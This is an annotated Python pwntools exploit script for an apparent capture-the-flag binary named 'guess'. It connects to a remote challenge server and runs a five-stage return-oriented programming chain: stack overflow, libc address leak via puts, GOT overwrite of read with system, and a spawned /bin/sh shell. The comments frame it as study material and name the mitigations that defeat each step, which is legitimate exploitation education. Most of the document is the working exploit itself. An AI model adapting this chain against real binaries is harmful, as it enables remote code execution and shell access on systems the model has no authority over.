from pwn import *
import os
# Annotated walkthrough of this challenge exploit, written for someone
# studying the technique and the mitigations that break each step.
# The script is Python 2 (`print` statements, str.encode('hex'),
# str/bytes mixing); it will not run unmodified under Python 3.
rand_value = int(os.urandom(4).encode('hex'), 16) % 500  # computed but never used below
#s = process("./guess")
s = remote("pwnable.shop",10003)
libc = ELF("./libc")   # the libc shipped with the challenge; every offset below is tied to this exact build
elf = ELF("./guess")
# Hard-coded gadget addresses. These are only usable because the binary
# is loaded at a fixed address (0x4007xx, i.e. not PIE); PIE would
# randomize them and force a code-address leak first.
pop_rsi_r15 = 0x00400761
pop_rdi = 0x00400763        # same value as the literal used for the first chain entry below
s.recvuntil("Input String!")
# --- Stage 1: overflow the input buffer with 65 copies of 0x00400778.
# What sits at that address is not shown on this page (presumably a
# `ret` used as padding — confirm against the binary). A stack canary
# or a length-checked read would stop this step.
pay = p64(0x00400778)*65
# --- Stage 2: puts(got['puts']) prints the runtime address of puts,
# from which libc_base is derived below (this is what sidesteps ASLR
# for libc).
pay += p64(0x00400763)      # pop rdi; ret  (== pop_rdi)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])
# --- Stage 3: read(0, bss+0x10, <rdx unchanged>) — the chain never sets
# rdx, so the count is whatever the register holds at that point. The
# data read here is the "/bin/sh\x00" sent after the leak.
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)               # r15, don't-care
pay += p64(elf.plt['read'])
# --- Stage 4: read(0, got['read'], ...) — overwrites read's GOT slot with
# the 8 bytes sent last (the computed system address). This only works
# because the GOT is writable; Full RELRO makes it read-only and
# defeats this step outright.
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['read'])
pay += p64(0)               # r15, don't-care
pay += p64(elf.plt['read'])
# --- Stage 5: call read@plt once more; its GOT entry now points at
# system, so this is effectively system(bss+0x10) == system("/bin/sh").
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['read'])
s.send(pay)
print s.recvline()  # consume the line that precedes the leaked bytes
leak = u64(s.recv(6)+'\x00\x00')  # 6 leaked bytes padded to an 8-byte little-endian value
print "leak : " + hex(leak)
libc_base = leak - libc.symbols['puts']
# NOTE: this chained assignment also rebinds `leak`, and `one_shot` is
# never used afterwards. 0xf1147 is a build-specific one-gadget offset
# whose origin is not shown on this page.
one_shot = leak = libc_base + 0xf1147
print "libc_base : " + hex(libc_base)
print "one_shot : " + hex(one_shot)
system = libc_base + libc.symbols['system']
s.send("/bin/sh\x00")   # consumed by the Stage 3 read into bss+0x10
s.send(p64(system))     # consumed by the Stage 4 read into got['read']
s.interactive()